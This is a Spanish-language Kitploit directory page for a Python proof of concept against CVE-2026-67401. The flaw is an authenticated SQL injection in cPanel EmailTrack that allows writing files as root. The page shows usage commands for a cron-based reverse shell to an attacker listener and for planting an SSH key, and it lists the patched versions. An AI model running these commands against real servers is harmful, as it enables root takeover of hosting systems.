Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-67401 — Prueba de concepto en Python para CVE-2026-67401, una inyección SQL autenticada en cPanel EmailTrack que permite la escritura arbitraria de archivos como root mediante SQLite ATTACH DATABASE, lo que posibilita una reverse shell o la colocación de claves SSH. | Kitploit
Herramientas/GitHubGitHub/axedos/cve-2026-67401
Escalada de PrivilegiosExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubaxedos/cve-2026-67401

CVE-2026-67401

Prueba de concepto en Python para CVE-2026-67401, una inyección SQL autenticada en cPanel EmailTrack que permite la escritura arbitraria de archivos como root mediante SQLite ATTACH DATABASE, lo que posibilita una reverse shell o la colocación de claves SSH.

Ver Repositorio
hace 19h 1mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-67401

Inyección SQL en cPanel EmailTrack. Un usuario autenticado de cPanel con privilegios de correo escribe archivos arbitrarios como root mediante SQLite ATTACH DATABASE. Una sola petición hasta root. No lo he probado en un objetivo real, el código solo está armado a partir de información pública y un diff básico. Haz tu debida diligencia como investigador, pruébalo y envía correcciones mediante PR.

Afecta a todas las compilaciones de cPanel/WHM anteriores al parche del 8 de septiembre de 2026.

Qué debe estar presente

  • Una cuenta de cPanel válida con privilegios de correo en el servidor objetivo
  • Python 3, librería requests
  • Un listener si se usa el payload de reverse shell

Cómo usarlo

root@kitploit:~
# Reverse shell mediante cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443

# Colocación de clave SSH
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub

# Sesión existente
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1

# Ejecución en seco (imprime la petición, no la envía)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1

CORRECCIONES

  • 11.138.0.4 (CURRENT/EDGE)
  • 11.136.0.39 (RELEASE/STABLE)
  • 11.134.0.55 (LTS)
Descargar herramienta